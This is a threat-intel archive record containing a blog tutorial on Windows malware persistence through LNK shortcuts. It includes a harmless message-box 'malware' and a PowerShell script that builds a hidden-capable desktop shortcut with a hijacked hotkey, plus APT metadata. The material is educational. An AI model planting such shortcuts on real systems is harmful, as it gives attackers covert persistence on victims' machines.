{
	"id": "543c8299-6ccf-4ab5-bc62-ab60cbd95593",
	"created_at": "2026-04-06T00:20:55.412863Z",
	"updated_at": "2026-04-10T13:12:35.839799Z",
	"deleted_at": null,
	"sha1_hash": "7d812b6f1a2815f24b18952461a878c6195923e5",
	"title": "Malware development: persistence - part 23. LNK files. Simple Powershell example.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1444714,
	"plain_text": "Malware development: persistence - part 23. LNK files. Simple\r\nPowershell example.\r\nBy cocomelonc\r\nPublished: 2023-12-10 · Archived: 2026-04-05 21:50:18 UTC\r\n3 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nThis post is based on my own research into one of the more interesting malware persistence tricks: via Windows\r\nLNK files.\r\nLNK\r\nAccording to Microsoft, an LNK file serves as a shortcut or “link” in Windows, providing a reference to an\r\noriginal file, folder, or application. For regular users, these files serve a meaningful purpose, facilitating file\r\norganization and workspace decluttering. However, from an attacker’s perspective, LNK files take on a different\r\nsignificance. They have been exploited in various documented attacks by APT groups and, to my knowledge,\r\nremain a viable option for activities such as phishing, establishing persistence, and executing payloads.\r\nhttps://cocomelonc.github.io/persistence/2023/12/10/malware-pers-23.html\r\nPage 1 of 9\n\nDid you know that a Windows shortcut can be assigned a hotkey that launches its target? This is the\r\nmain trick for malware persistence in this case.\r\npractical example\r\nLet’s say we have a “malware”. 
As usual, it is the meow-meow messagebox application hack.c :\r\n/*\r\nhack.c\r\nevil app for windows persistence\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/malware/2023/12/10/malware-pers-23.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#pragma comment (lib, \"user32.lib\")\r\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {\r\n MessageBox(NULL, \"Meow-meow!\", \"=^..^=\", MB_OK);\r\n return 0;\r\n}\r\nThen just create a PowerShell script that builds an LNK file with the following properties:\r\n# Define the path for the shortcut on the desktop\r\n$shortcutPath = \"$([Environment]::GetFolderPath('Desktop'))\\Meow.lnk\"\r\n# Create a WScript Shell object\r\n$wshell = New-Object -ComObject Wscript.Shell\r\n# Create a shortcut object\r\n$shortcut = $wshell.CreateShortcut($shortcutPath)\r\n# Set the icon location for the shortcut\r\n$shortcut.IconLocation = \"C:\\Program Files\\Windows NT\\Accessories\\wordpad.exe\"\r\n# Set the target path and arguments for the shortcut\r\n$shortcut.TargetPath = \"Z:\\2023-12-10-malware-pers-23\\hack.exe\"\r\n$shortcut.Arguments = \"\"\r\n# Set the working directory for the shortcut\r\n$shortcut.WorkingDirectory = \"Z:\\2023-12-10-malware-pers-23\"\r\n# Set a hotkey for the shortcut (e.g., CTRL+W)\r\n$shortcut.HotKey = \"CTRL+W\"\r\n# Set a description for the shortcut\r\n$shortcut.Description = \"Not malicious, meow-meow malware\"\r\n# Set the window style for the shortcut (7 = Minimized window)\r\n$shortcut.WindowStyle = 7\r\n# Save the shortcut\r\n$shortcut.Save()\r\n# Optionally make the link invisible by adding 'Hidden' attribute\r\n# (Get-Item $shortcutPath).Attributes += 'Hidden'\r\nAs you can see, the logic is pretty simple. We simply create a shortcut on the desktop that has a hotkey specified: CTRL+W. Of course, in real attack scenarios it could be something like CTRL+C, CTRL+V or CTRL+P, etc.\r\nFor example, if you create a shortcut for Paint, it does not have any hotkey specified:\r\nExplorer restricts shortcut hotkeys to combinations beginning with CTRL+ALT. Other sequences\r\nmust be set programmatically through COM.\r\ndemo\r\nLet’s see everything in action. First of all, compile our “malware”:\r\nx86_64-w64-mingw32-g++ -O2 hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sec\r\nTo check that it works, run it:\r\n.\\hack.exe\r\nThen just run our PowerShell script for persistence:\r\nGet-Content pers.ps1 | PowerShell.exe -noprofile -\r\nAs a result, the Meow LNK file is created successfully.\r\nIf we look at its properties, everything is ok:\r\nFinally, just run it and try to trigger the CTRL+W hotkey:\r\nAs you can see, everything worked perfectly as expected! =^..^= :)\r\nThis technique is used in the wild by APT groups like APT28, APT29 and Kimsuky, and by malware like Emotet. In all honesty, this method is widely employed because it is so convenient for deceiving victims.\r\nI hope this post spreads awareness of this interesting technique among blue teamers, and adds a weapon to the red teamers’ arsenal.\r\nMany thanks to my friend and colleague Anton Kuznetsov, who reminded me of this technique when he presented one of his most amazing talks.\r\nThis is a practical case for educational purposes only.\r\nATT\u0026CK MITRE: T1204.001\r\nAPT28\r\nAPT29\r\nKimsuky\r\nEmotet\r\nMSDN: Shell Link (.LNK) Binary File Format\r\nMalware persistence: part 1\r\nsource code in github\r\nThanks for your time, happy hacking and good bye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/persistence/2023/12/10/malware-pers-23.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://cocomelonc.github.io/persistence/2023/12/10/malware-pers-23.html"
	],
	"report_names": [
		"malware-pers-23.html"
	],
	"threat_actors": [
		{
			"id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e",
			"created_at": "2024-06-04T02:03:07.956135Z",
			"updated_at": "2026-04-10T02:00:03.689959Z",
			"deleted_at": null,
			"main_name": "IRON HEMLOCK",
			"aliases": [
				"APT29 ",
				"ATK7 ",
				"Blue Kitsune ",
				"Cozy Bear ",
				"The Dukes",
				"UNC2452 ",
				"YTTRIUM "
			],
			"source_name": "Secureworks:IRON HEMLOCK",
			"tools": [
				"CosmicDuke",
				"CozyCar",
				"CozyDuke",
				"DiefenDuke",
				"FatDuke",
				"HAMMERTOSS",
				"LiteDuke",
				"MiniDuke",
				"OnionDuke",
				"PolyglotDuke",
				"RegDuke",
				"RegDuke Loader",
				"SeaDuke",
				"Sliver"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb",
			"created_at": "2023-01-06T13:46:38.393409Z",
			"updated_at": "2026-04-10T02:00:02.955738Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"Cloaked Ursa",
				"TA421",
				"Blue Kitsune",
				"BlueBravo",
				"IRON HEMLOCK",
				"G0016",
				"Nobelium",
				"Group 100",
				"YTTRIUM",
				"Grizzly Steppe",
				"ATK7",
				"ITG11",
				"COZY BEAR",
				"The Dukes",
				"Minidionis",
				"UAC-0029",
				"SeaDuke"
			],
			"source_name": "MISPGALAXY:APT29",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434855,
	"ts_updated_at": 1775826755,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7d812b6f1a2815f24b18952461a878c6195923e5.pdf",
		"text": "https://archive.orkl.eu/7d812b6f1a2815f24b18952461a878c6195923e5.txt",
		"img": "https://archive.orkl.eu/7d812b6f1a2815f24b18952461a878c6195923e5.jpg"
	}
}